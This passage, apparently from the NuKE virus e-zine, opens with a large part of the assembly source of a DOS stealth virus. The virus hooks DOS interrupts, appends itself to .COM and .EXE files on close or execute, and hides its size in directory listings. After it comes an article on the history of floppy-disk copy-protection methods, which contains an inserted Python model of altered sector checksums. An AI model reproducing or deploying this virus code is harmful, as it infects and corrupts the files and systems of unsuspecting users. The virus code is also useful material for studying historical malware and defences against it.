add dx,word ptr cs:[buffer+14][bp]
cli
mov ss,dx ;restore ss
mov sp,word ptr cs:[buffer+16][bp] ;and sp
sti
jmp dword ptr cs:[buffer+20][bp] ;jmp to entry pt.
ax_reg dd 0
bp_reg dd 0
int13 dd 0
int1c dd 0
int21 dd 0
;===============================================================================
; Int 13h Handler
;===============================================================================
int13_handler:
cmp ax,0abcdh ;virus test
je int13_test ;yupe
int13call: jmp dword ptr cs:[int13] ;original int13
int13_test: mov bx,ax ;fix
iret
;===============================================================================
; Int 1Ch Handler
;===============================================================================
int1c_handler:
iret
;-------------------------------------------------------------------------------
; FCB Dir Stealth Routine (File Find)
;-------------------------------------------------------------------------------
fcb_dir: call calldos21 ;get the fcb block
test al,al ;test for error
jnz fcb_out ;jmp if error
push ax ;save registers
push bx
push cx
push es
mov ah,51h ;get current psp
call calldos21 ;call int21
mov es,bx ;es=segment of psp
cmp bx,es:[16h] ;psp of command.com?
jnz fcb_out1 ;no, then jmp
mov bx,dx ;ds:bx=fcb
mov al,[bx] ;1st byte of fcb
push ax ;save it
mov ah,2fh ;get dta
call calldos21 ;es:bx <- dta
pop ax ;get first byte
inc al ;al=ffh therefor al=ZR
jnz fcb_old ;if != ZR jmp
add bx,7h ;extended fcb here, +7
fcb_old: mov ax,es:[bx+17h] ;get file time stamp
mov cx,es:[bx+19h] ;get file date stamp
and ax,1fh ;unmask seconds field
and cx,1fh ;unmask day of month
xor ax,cx ;are they equal?
jnz fcb_out1 ;nope, exit then
sub word ptr es:[bx+1dh],virus_size ;sub away virus_size
sbb word ptr es:[bx+1fh],0 ;sub with carry flag
fcb_out1: pop es ;restore registers
pop cx
pop bx
pop ax
fcb_out: iret ;return control
;-------------------------------------------------------------------------------
; ASCIIZ Dir Stealth Routine (File Find)
;-------------------------------------------------------------------------------
dta_dir: call calldos21 ;get results to dta
jb dta_out ;if error, split
push ax ;save register
push bx
push cx
push es
mov ah,2fh ;get current dta
call calldos21 ;es:bx <- dta
mov ax,es:[bx+16h] ;get file time stamp
mov cx,es:[bx+18h] ;get file date stamp
and ax,1fh ;unmask seconds field
and cx,1fh ;unmask day of month
xor ax,cx ;are they equal
jnz dta_out1 ;nope, exit then
sub word ptr es:[bx+1ah],virus_size ;sub away virus_size
sbb word ptr es:[bx+1ch],0 ;sub with carry flag
dta_out1: pop es ;restore registers
pop cx
pop bx
pop ax
dta_out: retf 0002h ;pop 2 words of stack
;===============================================================================
; Int 21h Handler
;===============================================================================
int21_handler:
cmp ah,11h ;FCB find first match
je old_dir
cmp ah,12h ;FCB find next match
je old_dir
cmp ah,4eh ;Find first match
je new_dir
cmp ah,4fh ;Find next match
je new_dir
cmp ah,3dh ;Opening a file
je file_open
cmp ah,6ch ;Ext_opening a file
je file_ext_open
cmp ah,3eh ;closing a file
je file_close
cmp ah,4bh ;Execution of a file
je file_execute
int21call: jmp dword ptr cs:[int21] ;original int21
old_dir: jmp fcb_dir ;fcb file find
new_dir: jmp dta_dir ;new asciiz file find
file_open: jmp open_file ;disinfect opening file
file_ext_open: jmp open_ext_file ;disinfect opening file
file_close: jmp close_file ;infect closing file
file_execute: call check_extension ;check for ok ext
cmp byte ptr cs:[com_ext],1 ;is it a com?
je exec_disinfect ;yupe disinfect it
cmp byte ptr cs:[exe_ext],1 ;is it a exe?
je exec_disinfect ;yupe disinfect it
jmp SHORT int21call
exec_disinfect: call exec_disinfect1 ;Disinfect file
mov word ptr cs:[ax_reg],dx
pushf ;fake an int
call dword ptr cs:[int21] ;call dos
xchg word ptr cs:[ax_reg],dx ;restore dx
mov byte ptr cs:[close],0 ;reset flag..
push ax ;store 'em
push bx
push cx
push dx
push si
push di
push es
push ds
closing_infect: mov ax,3524h ;get error handler
call calldos21 ;call dos
push es ;save es:bx= int_24
push bx ;error handler
push ds ;ds:dx= asciiz string
push dx
push cs ;cs=ds
pop ds
mov dx,offset int21_handler ;hook error handler
mov ax,2524h ;with our int24h
call calldos21
pop dx ;restore ds:dx asciiz
pop ds ;string
cmp byte ptr cs:[close],0 ;Are we closing file?
je exec_get_att ;nope, then jmp
mov ax,word ptr cs:[handle] ;yupe, ax=file handle
jmp exec_open_ok ;jmp so you don't open
;the file twice...
exec_get_att: mov ax,4300h ;get file attribs
call calldos21 ;call dos
jnc exec_attrib ;no, error jmp
jmp exec_exit2 ;ERROR - split
exec_attrib: mov byte ptr cs:[attrib],cl
test cl,1 ;check bit 0 (read_only)
jz exec_attrib_ok ;if bit0=0 jmp
dec cx ;else turn of bit_0
mov ax,4301h ;write new attribs
call calldos21 ;call dos
exec_attrib_ok: mov ax,3d02h ;open file for r/w
call calldos21 ;call dos
jnc exec_open_ok ;ok, no error jmp
jmp exec_exit2 ;ERROR - split
exec_open_ok: xchg bx,ax ;bx=file handler
push cs ;cs=ds
pop ds
mov ax,5700h ;get file time/date
call calldos21 ;call dos
mov word ptr cs:[old_time],cx ;save file time
mov word ptr cs:[org_time],cx
mov word ptr cs:[old_date],dx ;save file date
and cx,1fh ;unmask second field
and dx,1fh ;unmask date field
xor cx,dx ;are they equal?
jnz exec_time_ok ;nope, file not infected
jmp exec_exit3 ;FILE INFECTED
exec_time_ok: and word ptr cs:[old_time],0ffe0h ;reset second bits
or word ptr cs:[old_time],dx ;seconds=day of month
mov ax,4200h ;reset ptr to beginning
xor cx,cx ;(as opened files may
xor dx,dx ; have ptr anywhere,
call calldos21 ; so be smart!)
mov word ptr cs:[marker],0DBDBh ;File Infection marker
mov dx,offset ds:[buffer] ;ds:dx buffer
mov cx,18h ;read 18h bytes
mov ah,3fh ;read from handle
call calldos21 ;call dos
jc exec_exit1 ;error? if yes jmp
sub cx,ax ;did we read 18h bytes?
jnz exec_exit1 ;if no exit
mov dx,cx ;cx=0 dx=0
mov ax,4202h ;jmp to EOF
call calldos21 ;call dos
jc exec_exit1 ;error? exit if so.
mov word ptr cs:[filesize+2],ax ;save lower 16bit fileSz
mov word ptr cs:[filesize],dx ;save upper 16bit fileSz
call chkbuf ;check if .exe
jz exec_cool ;jmp if .exe file
cmp ax,0FFF0h - virus_size ;64k-256-virus < 64k?
jb exec_cool ;if less jmp!
exec_exit1: jmp exec_exit3 ;exit!
exec_cool: mov dx,offset init_virus ;ds:dx=virus beginning
mov cx,virus_size ;cx=virus size
mov ah,40h ;write to handle
call calldos21 ;call dos
jc exec_exit1 ;error? if yes exit
sub cx,ax ;cx=ax bytes?
jnz exec_exit1 ;not equal exit
mov dx,cx ;cx=0 dx=0
mov ax,4200h ;jmp to top of file
call calldos21 ;call dos
jc exec_exit1 ;error, then exit
mov ax,word ptr cs:[filesize+2] ;ax=lower 16bit fileSize
call chkbuf ;check if .exe
jnz exec_com_file ;if !=.exe jmp
mov dx,word ptr cs:[filesize] ;get upper 16bit
mov cx,4 ;cx=0004
mov si,word ptr cs:[buffer+8] ;get exe header size
shl si,cl ;mul by 16
sub ax,si ;exe_header - filesize
sbb dx,0h ;sub with carry
mov cx,10h ;cx=0010
div cx ;ax=length in para
;dx=remainder
mov word ptr cs:[buffer+20],dx ;New IP offset address
mov word ptr cs:[buffer+22],ax ;New CS (In paragraphs)
add dx,virus_size+100h ;Dx=virus_size+256
mov word ptr cs:[buffer+16],dx ;New SP entry
mov word ptr cs:[buffer+14],ax ;New SS (in para)
add word ptr cs:[buffer+10],(virus_size)/16+1 ;min para
mov ax,word ptr cs:[buffer+10] ;ax=min para needed
cmp ax,word ptr cs:[buffer+12] ;cmp with max para
jb exec_size_ok ;jmp if ok!
mov word ptr cs:[buffer+12],ax ;nope, enter new max
exec_size_ok: mov ax,word ptr cs:[buffer+2] ;ax=file size
add ax,virus_size ;add virus to it
push ax ;push it
and ah,1 ;
mov word ptr cs:[buffer+2],ax ;restore new value
pop ax ;pop ax
mov cl,9 ;
shr ax,cl ;
add word ptr cs:[buffer+4],ax ;enter fileSz + header
mov dx,offset buffer ;ds:dx=new exe header
mov cx,18h ;cx=18h bytes to write
jmp SHORT exec_write_it ;jmp...
exec_com_file: sub ax,3 ;sub 3 for jmp address
mov word ptr cs:[buffer+1],ax ;store new jmp value
mov byte ptr cs:[buffer],0E9h ;E9h=JMP
mov dx,offset buffer ;ds:dx=buffer
mov cx,3 ;cx=3 bytes
exec_write_it: mov ah,40h ;write to file handle
call calldos21 ;call dos
mov dx,word ptr cs:[old_date] ;restore old date
mov cx,word ptr cs:[old_time] ;restore old time
mov ax,5701h ;write back to file
call calldos21 ;call dos
exec_exit3: mov ah,3eh ;close file
call calldos21 ;call dos
exec_exit2: pop dx ;restore es:bx (the
pop ds ;original int_24)
mov ax,2524h ;put back to place
call calldos21 ;call dos
pop ds
pop es
pop di ;pop registers
pop si
pop dx
xor cx,cx
mov cl,byte ptr cs:[attrib] ;get old file attrib
mov ax,4301h ;put them back
call calldos21 ;call dos
pop cx
pop bx
pop ax
cmp byte ptr cs:[close],0 ;get called by exec?
je exec_good_bye ;yep, then jmp
iret ;else exit now.
exec_good_bye: mov dx,word ptr cs:[ax_reg] ;restore dx
iret ;iret
;-------------------------------------------------------------------------------
; Close File Int21h/ah=3Eh
;-------------------------------------------------------------------------------
close_file: cmp bx,4h ;file handler > 4?
ja close_cont ;jmp if above
jmp int21call ;else exit
close_cont: push ax ;save 'em
push bx
push cx
push dx
push si
push di
push es
push ds
push bx ;save file handler
mov ax,1220h ;get job file table!
int 2fh ;call multiplex
;es:di=JFT for handler
mov ax,1216h ;get system file table
mov bl,es:[di] ;bl=SFT entry
int 2fh ;call multiplex
pop bx ;save file handler
add di,0011h
mov byte ptr es:[di-0fh],02h ;set to read/write
add di,0017h
cmp word ptr es:[di],'OC' ;check for .COM file
jne closing_next_try ;no try next ext
cmp byte ptr es:[di+2h],'M' ;check last letter
je closing_cunt3 ;no, file no good, exit
closing_exit: jmp closing_nogood ;exit
closing_next_try:
cmp word ptr es:[di],'XE' ;check for .EXE file
jne closing_exit ;no, exit
cmp byte ptr es:[di+2h],'E' ;check last letter
jne closing_exit ;no, exit
closing_cunt3: mov byte ptr cs:[close],1 ;set closing flag
mov word ptr cs:[handle],bx ;save handler
jmp closing_infect ;infect file!
closing_nogood: pop ds ;restore 'em
pop es
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp int21call ;good bye, baby...
;-------------------------------------------------------------------------------
; Execute Disinfecting routine
;-------------------------------------------------------------------------------
exec_disinfect1 PROC
push ax ;save registers
push bx
push cx
push dx
push ds
mov ax,4300h ;get file attribs
call calldos21 ;call dos
test cl,1h ;is Read-only flag?
jz okay_dis ;no, jmp attribs ok
dec cx ;turn off bit 0
mov ax,4301h ;write new attribs
call calldos21 ;call dos
jnc okay_dis ;No error? then jmp
jmp end_dis ;error? exit!
okay_dis: mov ax,3d02h ;open file for r/w
call calldos21 ;call dos
jnc dis_fileopen ;No error? then jmp
jmp end_dis ;Error? exit!
dis_fileopen: xchg bx,ax ;bx=file handle
mov ax,5700h ;get file time/date
call calldos21 ;call dos
mov word ptr cs:[old_time],cx ;save file time
mov word ptr cs:[old_date],dx ;save file date
and cx,1fh ;unmask second field
and dx,1fh ;unmask date field
xor cx,dx ;are they equal?
jnz half_way ;nope, file not infected
mov ax,4202h ;jmp to EOF
xor cx,cx ;cx=0
xor dx,dx ;dx=0
call calldos21 ;call dos
push cs ;cs=ds
pop ds ;
mov cx,dx ;dx:ax=file size
mov dx,ax ;save to cx:dx
push cx ;save upper fileSz
push dx ;save lower fileSz
sub dx,1Ch ;filesize-1C=origin byte
sbb cx,0 ;sub with carry
mov ax,4200h ;position ptr
call calldos21 ;call dos
mov ah,3fh ;open file
mov cx,1Ch ;read last 1Ch bytes
mov dx,offset org_time ;put in ds:dx
call calldos21 ;call dos
call chkbuf ;Did it work?
je half ;Yes,Jmp
cmp word ptr ds:[marker],0DBDBh ;File REALLY Infected?
je half ;Yes, then jmp
pop dx
pop cx
half_way: jmp end_dis1 ;exit, error!
half: xor cx,cx ;cx=0
xor dx,dx ;dx=0
mov ax,4200h ;pointer to top of file
call calldos21 ;call dos
mov ah,40h ;write function
mov dx,offset buffer ;ds:dx=buffer
mov cx,18h ;cx=18h bytes to write
call chkbuf ;check if .exe?
jz SHORT dis_exe_jmp ;yep, jmp
mov cx,3h ;else write 3 bytes
dis_exe_jmp: call calldos21 ;call dos
pop dx ;pop original fileSz
pop cx
sub dx,virus_size ;Sub with virus_size
sbb cx,0 ;sub with carry
mov ax,4200h ;ptr top of virus
call calldos21 ;call dos
mov ah,40h ;write function
xor cx,cx ;write 0 bytes
call calldos21 ;call dos! (new EOF)
mov cx,word ptr ds:[org_time] ;get original time
mov dx,word ptr ds:[old_date] ;get original date
mov ax,5701h ;put back to file
call calldos21 ;call dos
end_dis1: mov ah,3eh ;close file handle
call calldos21 ;call dos
end_dis: pop ds ;restore values
pop dx
pop cx
pop bx
pop ax
ret
exec_disinfect1 ENDP
;-------------------------------------------------------------------------------
; Open File by DOS Int21h/ah=6ch
;-------------------------------------------------------------------------------
open_ext_file: push dx ;save DX
mov dx,si ;asciiz=DS:DX now
jmp open_ext ;jmp
;-------------------------------------------------------------------------------
; Open File by DOS Int21h/ah=3Dh
;-------------------------------------------------------------------------------
open_file: push dx ;save dx (asciiz)
open_ext: call check_extension ;check extension
cmp byte ptr cs:[com_ext],1 ;is it a .com?
je open_ok_ext ;yep, then jmp
cmp byte ptr cs:[exe_ext],1 ;is it a .exe?
je open_ok_ext ;yep, then jmp
jmp open_exit ;ext no good, exit!
open_ok_ext: call exec_disinfect1 ;disinfect file!
open_exit: pop dx ;restore dx
jmp int21call ;exit to dos...
;-------------------------------------------------------------------------------
; Checks Buffer (EXE) Header
;-------------------------------------------------------------------------------
chkbuf PROC
push si ;save register
mov si,word ptr cs:[buffer] ;get first word
cmp si,5A4Dh ;si=ZM?
je chkbuf_ok ;if yes exit
cmp si,4D5Ah ;si=MZ?
chkbuf_ok: pop si ;pop register
ret
chkbuf ENDP
;-------------------------------------------------------------------------------
; Check file Extension
;-------------------------------------------------------------------------------
check_extension PROC
pushf ;save flags
push cx ;save cx,si
push si
mov si,dx ;ds:[si]=asciiz
mov cx,128 ;scan 128 bytes max
mov byte ptr cs:[com_ext],0 ;reset .com flag
mov byte ptr cs:[exe_ext],0 ;reset .exe flag
check_ext: cmp byte ptr ds:[si],2Eh ;scan for "."
je check_ext1 ;jmp if found
inc si ;else inc and loop
loop check_ext ;loop me
check_ext1: inc si ;inc asciiz ptr
cmp word ptr ds:[si],'OC' ;is it .COM
jne check_ext2 ; ~~
cmp byte ptr ds:[si+2],'M' ;is it .COM
je com_file_ext ; ~
check_ext2: cmp word ptr ds:[si],'oc' ;is it .com
jne check_ext3 ; ~~
cmp byte ptr ds:[si+2],'m' ;is it .com
je com_file_ext ; ~
check_ext3: cmp word ptr ds:[si],'XE' ;is it .EXE
jne check_ext4 ; ~~
cmp byte ptr ds:[si+2],'E' ;is it .EXE
je exe_file_ext ; ~
check_ext4: cmp word ptr ds:[si],'xe' ;is it .exe
jne check_ext_exit ; ~~
cmp byte ptr ds:[si+2],'e' ;is it .exe
je exe_file_ext ; ~
jmp check_ext_exit ;neither exit
com_file_ext: mov byte ptr cs:[com_ext],1 ;found .com file
jmp SHORT check_ext_exit ;jmp short
exe_file_ext: mov byte ptr cs:[exe_ext],1 ;found .exe file
check_ext_exit: pop si ;restore
pop cx
popf ;save flags
ret
com_ext db 0 ;flag on=.com file
exe_ext db 0 ;flag on=.exe file
check_extension ENDP
;-------------------------------------------------------------------------------
; Original Int21h
;-------------------------------------------------------------------------------
calldos21 PROC
pushf ;fake int call
call dword ptr cs:[int21] ;call original int_21
ret
calldos21 ENDP
;===============================================================================
; Int 24h Handler
;===============================================================================
int24_handler:
mov al,3 ;don't report error...
iret ;later dude...
;-------------------------------------------------------------------------------
; FLAGS - FLAGS - FLAGS - FLAGS - FLAGS
close db 0 ;closing file
;-------------------------------------------------------------------------------
; END - END - END - END - END - END - END
flags dw 0 ;Flags are saved here
attrib db 0 ;file's attrib
filesize dd 0 ;filesize
handle dw 0 ;file handler
old_date dw 0 ;file date
old_time dw 0 ;file time
org_time dw 0 ;original file time
;-------------------------------------------------------------------------------
buffer db 0CDh,020h ; 0 (0) EXE file signature
db 090h,090h ; 2 (2) Length of file
db 090h,090h ; 4 (4) Size of file + header (512k)
db 090h,090h ; 6 (6) # of relocation items
db 090h,090h ; 8 (8) Size of header (16byte para)
db 090h,090h ; A (10) Min para needed (16byte)
db 090h,090h ; C (12) Max para needed (16byte)
db 090h,090h ; E (14) SS reg from start in para.
db 090h,090h ; 10(16) SP reg at entry
db 090h,090h ; 12(18) checksum
db 090h,090h ; 14(20) IP reg at entry
db 090h,090h ; 16(22) CS reg from start in para.
Marker db 0DBh,0DBh ; Marks THIS File as INFECTED!
last:
seg_a ends
end start
================================================================================
===============================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE "The Arms Race on Disk-Based Protection -N
E- Methods : Round One" Nu
-N uK
Nu By KE
uK Rock Steady E-
KE -N
E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nu
% The `Arms Race' on Disk-Based Copy Protection Methods : Round One %
Disk-based techniques of protecting software have existed since the early
days of microcomputers. The very first microcomputers used cassette tapes
to store programs and data. (Remember the C-64's old days?) The first mass-
market microcomputer to use disk drives instead of cassette tapes was the
Apple-II in 1978. Its great popularity was largely due to its reliable
and inexpensive disk drive system, devised by Steve Wozniak. The disks,
much faster and more convenient than cassettes, in turn made it practical
to run large and complex programs. Disks became standard equipment on all
but the cheapest microcomputers. The tremendous success of the IBM PC
microcomputer in the early 1980s confirmed this trend.
The history of disk-based protection methods, and of the efforts to defeat
them, resembles an escalating arms race, hence the name. Early, elementary
protection techniques were countered by skilled users; some did it for their
own convenience, others for the intellectual challenge. And so the arms race
began. The `guerrillas' of the arms race were the `software hackers', whose
mission was to devise a method for removing (`cracking') the copy-protection
of each new program marketed, and who then distributed the copyable version
to their friends, who passed it on, and so on.
I have witnessed and was quite an active member of this arms race; the
intellectual challenge was the main reason for my membership. Over the
years I have come upon several protection techniques, some of which I was
able to bypass easily, and others that posed a great challenge. Slowly I
began noting the several methods of disk-based copy-protection, and I also
acquired several documents on other disk-based copy-protection methods, and
today you will read about this very interesting concept of disk-based
copy-protection. Some methods were quite frightening, as they tried to perform
dangerous disk-access techniques. Some methods were quite trivial; others
relied on loops and flaws of the disk structures, and on how the disk
controller reacts. All the methods I was able to collect are documented
below; a lot of time and effort was put into this, and I do hope you
appreciate it.
% Disk Format %
The early generation of disk protection methods depended on technical details
of the diskette and disk drives. To describe the methods, it is first
necessary to outline the structure of a formatted floppy. For convenience I
will only use the IBM PC 5.25 inch disk, formatted by the popular PC-DOS or
MS-DOS.
Information is stored on the disk in a series of circles, called `tracks'. On
a normal 5.25 double density disk you have 40 such circles, aka tracks.
Tracks are numbered from 0, being the outermost track, to 39, being the inner-
most. Each track is divided into 9 arcs, called `sectors', numbered from 0-8.
Each sector consists of an `address field', which identifies the sector, and
a `data field', which contains the data stored in that sector. Both fields
contain a prologue, the data, a checksum of the information stored in that
field, and an epilogue. Therefore, in reality DOS does NOT make the total
number of possible bytes available for your data storage. On a 5.25 DSDD
(double sided, double density) disk there is really a possible 500k, of which
only 360k is available to you. On a 5.25 DSHD (double sided, high density)
disk there is 1.6 Megs, but only 1.2 Megs is available to you. On a 3.5 DSDD
disk there is 1 Meg, but 720k is available to you. On a 3.5 DSHD disk there
is an amazing 2.0 Megs, but only 1.44 Megs is available to you.
The same applies to hard drives: ever buy a HD that says 120 Megs, but when
you format it you only get 114 Megs? It's because of DOS. There are some
programs that enable you to use this space and get rid of the address field
that is present before _every_ sector. One popular program is called
"MAXI - Form" by Herne Data Systems Ltd. This program allows a 360k floppy to
hold 420k, 720k -> 810k, 1.2M -> 1.44M, 1.44M -> 1.66M. Maxi CANNOT make use
of ALL the possible bytes, because we MUST reserve some space for the Boot
Sector, 2 copies of the FAT and the DIR structures. However, it does get rid
of the address fields, and is compatible with DOS with the help of a TSR
program that `fools' DOS into thinking that the disk was structured correctly.
Now, when you `boot' off a diskette, a copy of DOS _MUST_ reside on the outer
few tracks of the disk. Another track is reserved for the file directory. When
the computer is turned on, a process occurs called `booting'. The IBM PC
does not contain a built-in DOS. Its ROM contains just enough information
to enable it to find and read sector 0 of track 0 of the disk, which is the
boot sector. That sector contains a program to read a few more sectors, which
in turn contain a program to read the entire DOS into memory.
% Sector Format %
The majority of floppy disks are `soft-sectored', meaning that the software
must be able to locate any given track and sector with no help from the
hardware. On `hard-sectored' disks there is a physical marker, such as a
small index hole, that tells the hardware precisely where each track and
sector is physically located. On a soft-sectored disk the software
searches for the desired sector by a trial-and-error process, reading each
sector's address field until it finds the sector it wants. This certainly
takes a little longer, but allows much more flexibility, since the sectors may
be placed anywhere the DOS likes. Anyhow, floppies are usually soft-sectored,
but IBM 5.25 inch and 3.5 inch diskettes contain physical markers. Hard disks
usually tend to be soft-sectored, but that was only on the MFM and RLL hard
drives; the IDE and SCSI drives are hard-sectored, which is why we have a
_major_ difference in access time. MFM and RLL range at 50-70ms
(milliseconds); IDE and SCSI tend to range from 8-15ms.
% Copy-protection Method #1 : Disk Appearance %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
% Unformatted Tracks %
The simplest protection against disk copier utilities was to include a blank
(unformatted) track or sector on the disk. The disk copy utility will fail at
that track and copy nothing further. This was probably the first kind of whole-
disk copy protection introduced.
% Non-standard DOSes %
Although the disk cannot be copied, it will still boot and run properly as
long as the DOS does not attempt to access the unformatted track. This can
easily be arranged by using a modified version of the normal DOS. When
a disk is booted, the DOS on the disk replaces any that may have been in RAM.
It can have any modifications the author pleases. The only requirement is that
the modifications to the DOS must correlate with the modifications to the disk
format. Some of these methods are listed below.
a) Altered track/sector count
The number of tracks per disk and sectors per track are usually chosen
to provide maximum data storage per disk. There is no reason why lesser
numbers cannot be used. For example we could create an IBM disk with
only 7 sectors per track or 30 tracks per disk. And with a slightly more
complex DOS modification the number of sectors could vary from track to
track.
b) Altered sector size
A normal sector on an IBM PC disk always contains 512 bytes of user data
as its payload. It is easy to alter the DOS to expect a different number
of bytes per sector. In some cases, huge sectors have been used that fill
an entire track.
c) Altered track/sector numbering
Each sector on a disk has an address field containing its track number
and sector number. The DOS checks this before reading the track. Instead
of numbering the sectors on a track from 0 to 9, one could number them
from 70 to 79. The 40 tracks, likewise, could have bizarre numbering,
say the first 40 prime numbers.
d) Altered checksums
Each sector contains a byte which is a checksum of the data contained in
that sector. It is calculated by performing an eXclusive-OR (XOR)
operation across all the bytes in the sector. The DOS recalculates the
checksum each time it reads a sector, and compares its value to the one
actually stored in the sector. If they differ, the DOS assumes that it
read some byte(s) in the sector incorrectly. One can protect a disk by
using a different algorithm for calculating the checksum to be stored in
each sector. Of course the disk's own DOS uses the same algorithm, and so
agrees with the stored checksums, but standard DOS thinks it has read
each sector incorrectly, and will retry up to 5 times; once all 5 tries
fail it will report the "Bad CRC Data...." error message.
e) Half-Tracks
The newer half-height floppy drives were quite advanced; as a matter of
fact they were capable of stepping to positions half-way between the
normal track positions. These half-track positions are not ordinarily
suitable for recording data, because they are so close to the normal
track that there would be crosstalk (meaning signals would spill over from
the normal tracks to the half-tracks and vice-versa). On the other hand,
the half-tracks can be used if the normal tracks are left unused. For
instance a disk could use tracks 0, 1.5, 2.5, 4, 5, etc. A normal copy
program will miss all the half-tracks.
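As an added illustration (not part of the article above), here is a constructed
model of the sector layout described earlier and of method (d): the same sector
is laid out once with the standard XOR checksum and once with an altered one.
A reader using the standard algorithm rejects the altered sector on every one
of its 5 retries, while a reader carrying the altered algorithm accepts it. The
prologue/epilogue marker bytes, the complemented checksum and the retry loop are
assumptions made for this example.

```python
import struct

# Constructed model of the soft-sector layout described above: each field is
# prologue | payload | checksum | epilogue. The marker bytes are made up for
# this example; a real PC diskette uses the controller's own sync/ID marks.
ADDR_PROLOGUE = b"\xD5\xAA\x96"
DATA_PROLOGUE = b"\xD5\xAA\xAD"
EPILOGUE = b"\xDE\xAA"
SECTOR_SIZE = 512
MAX_RETRIES = 5          # the article: standard DOS retries up to 5 times


def dos_checksum(payload: bytes) -> int:
    """The standard algorithm from method (d): XOR across every byte."""
    c = 0
    for b in payload:
        c ^= b
    return c


def protected_checksum(payload: bytes) -> int:
    """A deliberately different algorithm, as a modified DOS might carry.

    Assumed for the example: the same XOR, then complemented, so that the
    stored byte never agrees with what standard DOS recomputes.
    """
    return dos_checksum(payload) ^ 0xFF


def build_sector(track: int, sector: int, data: bytes, checksum=dos_checksum) -> bytes:
    """Lay out one sector (address field + data field) using `checksum`."""
    if len(data) != SECTOR_SIZE:
        raise ValueError("payload must be exactly one sector")
    addr = struct.pack("BB", track, sector)
    address_field = ADDR_PROLOGUE + addr + bytes([checksum(addr)]) + EPILOGUE
    data_field = DATA_PROLOGUE + data + bytes([checksum(data)]) + EPILOGUE
    return address_field + data_field


def parse_sector(raw: bytes, checksum=dos_checksum):
    """Return (track, sector, data); raise ValueError on any field mismatch."""
    if raw[:3] != ADDR_PROLOGUE:
        raise ValueError("address prologue not found")
    track, sector = raw[3], raw[4]
    if raw[5] != checksum(raw[3:5]) or raw[6:8] != EPILOGUE:
        raise ValueError("address field checksum/epilogue mismatch")
    body = raw[8:]
    if body[:3] != DATA_PROLOGUE:
        raise ValueError("data prologue not found")
    data = body[3:3 + SECTOR_SIZE]
    stored = body[3 + SECTOR_SIZE]
    if stored != checksum(data) or body[4 + SECTOR_SIZE:6 + SECTOR_SIZE] != EPILOGUE:
        raise ValueError("data field checksum/epilogue mismatch")
    return track, sector, data


def read_with_retries(raw: bytes, checksum=dos_checksum):
    """Model the DOS behaviour from method (d): up to MAX_RETRIES attempts,
    then give up ("Bad CRC Data"). Returns (data, attempts) or (None, attempts)."""
    for attempt in range(1, MAX_RETRIES + 1):
        try:
            return parse_sector(raw, checksum)[2], attempt
        except ValueError:
            continue          # a real drive would re-read the media here
    return None, MAX_RETRIES


if __name__ == "__main__":
    payload = bytes(range(256)) * 2                      # constructed 512-byte payload
    original = build_sector(0, 3, payload)               # plain DOS diskette
    protected = build_sector(0, 3, payload, protected_checksum)
    print("standard DOS reads standard sector:", read_with_retries(original)[1], "attempt(s)")
    print("standard DOS reads protected sector:", read_with_retries(protected))
    print("modified DOS reads protected sector:", read_with_retries(protected, protected_checksum)[1], "attempt(s)")
```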
% Nibble Copy Programs Fight Back %
In response to the above protection techniques, computer hobbyists began to
write and circulate special copy programs known as `Nibble Copiers'. These were
passed gratis along the grapevine of hobbyists. The first commercially
advertised bit copier was `Locksmith' by Omega Microware of Chicago, at around
1984. The first version of Locksmith was slow but reliable, and was able to
cope quite easily with all the copy-protection methods described above. Within
a year other companies' programs appeared, like Copy-Write, Copy-II-PC and
E.D.D., but Locksmith remained the most prominent until Omega Microware
collapsed around 1985-86.
A bit copier makes as few assumptions as possible about the format of the disk.
It does not assume any particular number of sectors per track or tracks per
disk, or any other possible sector alteration. This is something DOS was never
able to do. Bit copiers read each track, and attempt to reproduce exactly what
they find on the destination disk, bit for bit. Error checking is performed by
reading the track several times over and comparing the data. Completely
unformatted tracks are identified and ignored.
% Spiral Tracking %
This is probably the ultimate in format alteration, and the last to be
developed. This method was actually very clever. The way the data was
structured on the diskette actually `looked' like a spiralling pattern.
The floppy drive heads would travel a small arc starting from the outer
track, then jump to the next track (or half-track) and immediately travel
another small arc, then jump to the next track, and so on. The resulting
series of arcs resembles a broken spiral, hence the name. So instead of track
1 being the outermost ring, it would spiral towards the innermost track. This
type of protection is quite difficult for a bit copier to overcome, since it
depends on the accurately synchronized copying of partially formatted tracks.
Unformatted areas of tracks contain magnetic signals of intermediate values,
bits neither 0 nor 1. Therefore it was extremely difficult for the bit copier
to identify all those portions of the track that can be copied correctly. One
serious problem with spiral tracking is that it depends on precise timing of
events. If the disk drive is rotating a bit too fast or slow, or is slightly
misaligned in other ways, the protected disk is likely to fail.
% Slow Drives %
Another protection technique used in combination with some of the above methods
is to record the protected software using a disk drive turning SLOWER than
normal. When data is recorded on a track passing slowly under the head, more
data per inch than normal is recorded. This makes it possible to record more
data on a track than would normally fit. Therefore if the user would try to
copy the software with a regular drive, the destination disk will complete
a full revolution before all the data is copied, and the tail of the track will
overlap and destroy the head of the track on the destination disk.
% Copy-protection Method #2 : Signatures %
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
As we can see, in the protection wars escalation proceeded rapidly. The methods
described above were all `format alteration' methods. They use a non-standard
disk format that is not recognized by standard copy programs, but is copyable
by the bit copiers. So a new method was introduced, the signature, which was
any minor feature of a disk that serves as an identification mark to verify
that the disk is an original. To be effective, a signature must be a feature
that is not properly duplicated by a copy program, including bit copiers.
% Innermost track %
Probably the first signature protection method was the use of an extra track.
A normal IBM disk uses tracks 0 to 39. The disk drive is in fact capable of
stepping the head to an extra innermost track, track 40 (and sometimes to
track 41). The innermost track is normally unused because of reliability
problems. A protected program may format this track and use the fact that it
is formatted as a signature to verify that the disk is an original. It may even
keep some portion of itself (eg the disk directory) on the innermost track. An
ordinary copy program will overlook this track, and a bit copier will only copy
it if specifically instructed to.
% Check for write-protection %
An ancient and crude signature method is to issue original disks with the
write-protect notch covered. The program would try to write to the disk; if
the write operation succeeds, the program can assume that the user made a
duplicate disk, and refuse to execute.
% Bit Counting %
It is _very_ difficult to get two disk drives to turn at precisely the same
speed. Any characteristic of a disk that depends critically on the speed of
the drive on which it was recorded will make a good signature. For example,
when a disk is formatted, there is always some empty space remaining on each
track between the end of the last sector and the beginning of the first sector.
The formatting program fills this space with meaningless bits. The size of the
